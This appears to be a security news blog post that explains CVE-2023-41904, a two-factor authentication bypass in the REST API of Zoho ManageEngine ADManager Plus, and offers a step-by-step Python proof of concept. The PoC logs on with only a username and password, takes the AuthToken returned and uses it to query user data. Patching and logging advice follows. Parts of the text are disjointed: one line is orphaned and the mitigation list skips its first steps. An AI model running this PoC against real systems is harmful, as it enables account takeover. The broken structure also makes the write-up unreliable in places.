CVE CyberSecurity Database News

CVE-2023-41904 - 2FA Bypass in Zoho ManageEngine ADManager Plus (REST API Exploit Guide)

Poster -

Zoho ManageEngine ADManager Plus is a popular tool for managing Active Directory environments. In late 2023, a critical vulnerability was disclosed—CVE-2023-41904—allowing attackers to completely bypass two-factor authentication (2FA) for REST API calls. This could lead to unauthorized access, credential theft, or account takeover, significantly compromising business security.

This post will walk you through the vulnerability, including a technical breakdown, example exploit, and references, all in straightforward terms.

What is CVE-2023-41904?

CVE-2023-41904 is an authentication bypass vulnerability in Zoho ManageEngine ADManager Plus, impacting all versions before 7203. The flaw enables threat actors to generate AuthTokens via the REST API without completing the enforced (supposedly) 2FA process.

In simpler words: An attacker can log in as any 2FA-enabled user, skipping an important security step intended to protect accounts.

More about this CVE

- Zoho Advisory
- NIST NVD CVE Entry

Receive an AuthToken allowing API access.

The bug: The REST API endpoint /RestAPI/Logon fails to enforce the 2FA validation for AuthToken generation—meaning if an attacker only sends a username and password, the system still generates a valid AuthToken.

PoC: Exploiting the 2FA Bypass

Disclaimer: This article is for educational purposes. Always have authorization before testing these techniques!

Let’s assume you know (or can guess) a user's basic credentials.

1. Make a REST API request to the logon endpoint (no 2FA token needed)

import requests

url = "https://target.host:808/RestAPI/Logon";
headers = {'Content-Type': 'application/json'}
data = {
    "USERNAME": "victimuser",
    "PASSWORD": "userpassword"
    # No 2FA token provided!
}

response = requests.post(url, json=data, verify=False)

print(response.json())

Expected output

{
    "AuthToken": "some-long-access-token",
    "message": "User Authenticated"
}

2. Use the AuthToken for further API calls

headers = {
    'Authorization': 'Bearer some-long-access-token',
    'Content-Type': 'application/json'
}

user_info_url = "https://target.host:808/RestAPI/UserDetails?USERNAME=victimuser";
user_response = requests.get(user_info_url, headers=headers, verify=False)

print(user_response.json())

If successful, you can access restricted/admin data.

Why is This So Serious?

- Impact: Complete bypass of 2FA == huge risk. Attackers can take over accounts even with 2FA turned on.

Scope: Affects anyone running ADManager Plus prior to v7203.

- Attack Simplicity: Minimal technical skill required—just basic knowledge of REST APIs and Python.

Update: Apply the patch provided by Zoho.

Security Updates Download

Audit: Review logs for unrecognized REST API logins.

3. Network Controls: Restrict access to the ADManager Plus web interface and API to trusted IPs only.

References

- Zoho ManageEngine Security Advisories
- CVE-2023-41904 @ NIST
- Zoho Download Page

Takeaway

CVE-2023-41904 is a high-severity, easy-to-exploit bug in Zoho’s enterprise software. The fix is straightforward: update to the latest version. If you run ADManager Plus and haven’t applied the patch yet, do so as soon as you can. Don’t rely on 2FA alone—always keep critical software up to date.

Timeline

Published on: 09/27/2023 15:19:00 UTC
Last modified on: 09/28/2023 17:41:00 UTC